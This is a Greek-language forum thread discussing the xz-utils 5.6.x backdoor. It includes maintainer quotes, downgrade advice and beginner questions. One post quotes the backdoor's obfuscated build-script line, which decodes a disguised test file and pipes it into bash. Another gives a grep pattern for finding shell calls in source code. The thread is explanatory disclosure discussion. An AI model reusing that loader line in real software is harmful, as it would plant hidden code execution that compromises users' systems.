Backdoor στο xz-utils >=5.6.0

[GoofyX]

Προσοχή με το xz-utils, όσοι είστε στην έκδοση 5.6.0+, κάντε αμέσως downgrade. Από αυτά που διάβασα, σε αυτές τις εκδόσεις περιλαμβάνεται κάποιο commit που επιτρέπει την αποφυγή του sshd authentication, αν η βιβλιοθήκη liblzma φορτωθεί από το ssh daemon.

https://xeiaso.net/notes/2024/xz-vuln/

https://gist.github.com/thesamesam/2...ent_id=5005868

[Ronin]

"Through a series of complex obfuscations, the liblzma build process extracts a prebuilt object file from a disguised test file existing in the source code, which is then used to modify specific functions in the liblzma code," the IBM subsidiary said in an advisory."

"Very annoying - the apparent author of the backdoor was in communication with me over several weeks trying to get xz 5.6.x added to Fedora 40 & 41 because of it's "great new features". We even worked with him to fix the valgrind issue (which it turns out now was caused by the backdoor he had added). We had to race last night to fix the problem after an inadvertent break of the embargo.

He has been part of the xz project for 2 years, adding all sorts of binary test files, and to be honest with this level of sophistication I would be suspicious of even older versions of xz until proven otherwise. "

Ο τύπος έκανε μέγιστη ζημιά.

[GoofyX]

Άντε μετά να ξαναεμπιστευτείς (και εμείς και οι διανομές) το xz...

[SWBiiLive]

Άντε μετά να ξαναεμπιστευτείς (και εμείς και οι διανομές) το xz...

παει αυτό ... its official dead

Ο τύπος έκανε μέγιστη ζημιά.

εχω την εντυπωση οτι αυτο ειναι προεορτια ενος νεου μεγαλου πολεμου αλλά παλι ισως οχι και μακαρι να κανω λαθος

[GoofyX]

Maintainers από άλλα repositories που έκανε commit ο τύπος ψάχνονται να δουν τι commit είχε κάνει τότε και αν μπορεί να είναι malicious.

Πχ. libarchive: https://bugs.gentoo.org/928146

Επίσης: https://boehs.org/node/everything-i-...he-xz-backdoor

- - - Updated - - -

Εμφανίστηκε ο Lasse Collin, ο πρώτος developer: https://tukaani.org/xz-backdoor/

[SWBiiLive]

Maintainers από άλλα repositories που έκανε commit ο τύπος ψάχνονται να δουν τι commit είχε κάνει τότε και αν μπορεί να είναι malicious.

Εμφανίστηκε ο Lasse Collin, ο πρώτος developer: https://tukaani.org/xz-backdoor/

και κάπως ετσι ενας contributor συμπαρεσυρε τον κυριο dev στην κολαση μιας και απο μονος του πλεον χωρις να του πει κανενας και θα ψαξει γραμμη προς γραμμη τι προσθεσε ο Jia Tan αλλα και ηδη αρχισε να απολογειται για το τι εκανε αυτος και τι ο αλλος

ασε που κανεις δεν θα τον εμπιστευεται απο εδω και περα και θα το κοιταζουν ολοι με μισο ματι...

υ.γ, αυτο ανοιξε τους μεγαλους ασκους του Αιολου...

αφηνω εδω τις 1ες παραγραφους απο mails του debian
https://bugs.debian.org/cgi-bin/bugr...gi?bug=1068024

1)

"Package: xz-utils
Version: 5.6.1+really5.4.5-1
Severity: important
Tags: security

I count a minimum of 750 commits or contributions to xz by Jia Tan, who
backdoored it.

This includes all 700 commits made after they merged a pull request in Jan 7
2023, at which point they appear to have already had direct push access, which
would have also let them push commits with forged authors. Probably a number of
other commits before that point as well.

Reverting the backdoored version to a previous version is not sufficient to
know that Jia Tan has not hidden other backdoors in it. Version 5.4.5 still
contains the majority of those commits."



2)

"On 2024-03-29 16:25, Joey Hess wrote:
> I'd suggest reverting to 5.3.1. Bearing in mind that there were security
> fixes after that point for ZDI-CAN-16587 that would need to be reapplied.

Note that reverted to such an old version will break packages that use
new symbols introduced since then. From a quick look, this is at least:
- dpkg
- erofs-utils
- kmod
"

και εβαλα μονο αυτα που ειναι τεχνικής αποψεως χωρις να προσθεσω το αχρειαστο δραμα που ηδη ξεκινησε....

[GoofyX]

Μάλλον το πιο ασφαλές σε αυτή τη φάση για το xz-utils για μια διανομή είναι να βάλει την τελευταία έκδοση που έκανε ο Lasse, την 5.4.2. Αυτό έκανε το Gentoo.

[SWBiiLive]

αν αναρωτιέται κανείς ποια ηταν η μορφή της backdoor στην xz library, αυτή η γραμμή ειναι

Κώδικας:

" sed rpath ../../../tests/files/bad-3-corrupt_lzma2.xz | tr "	 \-_" " 	_\-" | xz -d | /bin/bash >/dev/null 2>&1;"

που οπως εξηγει αυτός που το βρηκε αφήνει ως αποτελεσμα...

Κώδικας:

 "| bash"

απο https://www.openwall.com/lists/oss-s...y/2024/03/29/4

τόσο απλά γιατι παιρνει pipe την bash!

και καπου εδω ξεκιναει το μεγαλο ψαξιμο στους κωδικες ..

π.χ.

Κώδικας:

grep -E -r -color "bash|sh|csh|tcsh|zsh|scsh|ksh"  --include=*.{h,cpp} .

[johnmayson2]

Καλησπερα σαν αρχαριος χρηστης που ειμαι διαφωτιστε με.Μεχρι χτες το πρωι ειχα fedora 40 beta.Σημερα εμαθα για το xz το οποιο αν καταλαβα καλα ειναι για αποσυμπιεση αρχειων.Αυτο αν καποιος εγκαταστησει νεο iso fedora h tubletweed συμπεριλαμβανεται και ειναι στη εκδοση 5.4 οπου θεωρητικως ειναι ασφαλης σωστα καταλαβα;; Γιατι δε το αφαιρουν τελειως απο το iso??? Ενας απλος χρηστης τι πρεπει να κανει αν εγκαταστησει τωρα tublet h fedora.

[SWBiiLive]

Καλησπερα σαν αρχαριος χρηστης που ειμαι διαφωτιστε με.Μεχρι χτες το πρωι ειχα fedora 40 beta.Σημερα εμαθα για το xz το οποιο αν καταλαβα καλα ειναι για αποσυμπιεση αρχειων.Αυτο αν καποιος εγκαταστησει νεο iso fedora h tubletweed συμπεριλαμβανεται και ειναι στη εκδοση 5.4 οπου θεωρητικως ειναι ασφαλης σωστα καταλαβα;; Γιατι δε το αφαιρουν τελειως απο το iso??? Ενας απλος χρηστης τι πρεπει να κανει αν εγκαταστησει τωρα tublet h fedora.

η fedora ειναι η beta εκδοση της Red Hat και εβαλες την Fedora beta?

Τώρα αυτό ειναι beta² ή betax2?

/joke mode off

προσωπικα δεν θα το θεωρουσα ασφαλης γιατι ο τυπος εχει δραστηριοτητα 2 χρόνια και μπορει να εχει φυτεψει και αλλα backdoors!

αυτο βρεθηκε μεχρι στιγμης...

συμβουλή μου? οτι πουν οι dev της fedora. ακομα μιλανε . το τελευταιο msg ειναι πριν 24 min ...

https://discussion.fedoraproject.org...pond/110683/19


μην βαλεις τιποτα κωδικους email e-banking κλπ μεχρι να σιγουρευτεις και αν εχεις ηδη βαλει δεν ηρθε η συντελεια απλα κατεγραψε ΣΕ ΕΝΑ ΧΑΡΤΙ ΠΟΥ ΕΙΝΑΙ ΑΧΑΚΑΡΙΣΤΟ που εχεις ηδη βαλει...

[jim_p]

Μια troll μετατροπη ενος γνωστου xkcd κομικ που πετυχα στο reddit
https://www.reddit.com/media?url=htt...165n4grc1.jpeg

[MyISLM]

Το κακό είναι οτι το github έκοψε την πρόσβαση. Τα θεώρησε όλα ραδιενεργά.

Το κακό είναι οτι ο συγκεκριμένος "κινέζος" dev είχε συμμετάσχει και σε αλλα projects, καπου αναφέρουν και το openssl.

- - - Updated - - -

Καλησπερα σαν αρχαριος χρηστης που ειμαι διαφωτιστε με

Ψάξε ενημερώσεις θα βγούνε και που θα χρησιμοποιούν έκδοση xz που δεν έχει τη συγκεκριμένη αδυναμία.

Αν και ο συγκεκριμένος που την έβαλε (όπως φαίνεται δολίως) ήταν βασικός συμμετέχων στο project.

[GoofyX]

Το κακό είναι οτι το github έκοψε την πρόσβαση. Τα θεώρησε όλα ραδιενεργά.

Το κακό είναι οτι ο συγκεκριμένος "κινέζος" dev είχε συμμετάσχει και σε αλλα projects, καπου αναφέρουν και το openssl.

Και στη βιβλιοθήκη libarchive είχε κάνει. Κι εκεί ψάχνονται γενικώς να δουν τι θα κάνουν.

[johnmayson2]

Δε θα βαλω τιποτα.Δε ειναι μονο fedora ειναι και tubletweed και debian.Δε μπορω να καταλαβω γιατι δε αφαιρουν τελειως αυτο το xz απο τα iso ολων των εκδοσεων.Αφου και η προηγουμενη εκδοση δε ειμαστε σιγουροι οτι ειναι οκ.

[MyISLM]

Δε μπορω να καταλαβω γιατι δε αφαιρουν τελειως αυτο το xz

Σταδιακα θα αρχισει να αντικαθίσταται παντού με κώδικα που δεν έχει αδυναμία. Η βιβλιοθήκη χρησιμοποιείται σε πολλά σημεία. Να φοβάσαι ενσωματωμένες συσκευές IOT/ρουτεράκια που δεν βγαίνουν ενημερώσεις, όχι σταθερούς και λαπτοπς.

Σε κλειστού κώδικα πράγματα, τέτοια συζήτηση δεν θα γινόταν ποτέ. Στα Windows (που οι προγραμματιστές είναι επι πληρωμή) αν ανακαλυφθεί απο κάποιον τρίτο αδυναμία (πράγμα πολύ συχνό - δεν συζητάται τόσο γιατί είναι κλειστός ο κώδικας- ), απλά βγάζει ενημέρωση η Microsoft και την παίρνεις απο το Windows Update.

Πάω ενα στοίχημα οτι η Ubiquiti κεραία που μπαίνω στο internet και o WISP που έχω και δεν μου δίνει πρόσβαση, είναι αδύναμη σε αυτό.

Πιθανά commits στο openssl είναι αρκετά πιο επικίνδυνα.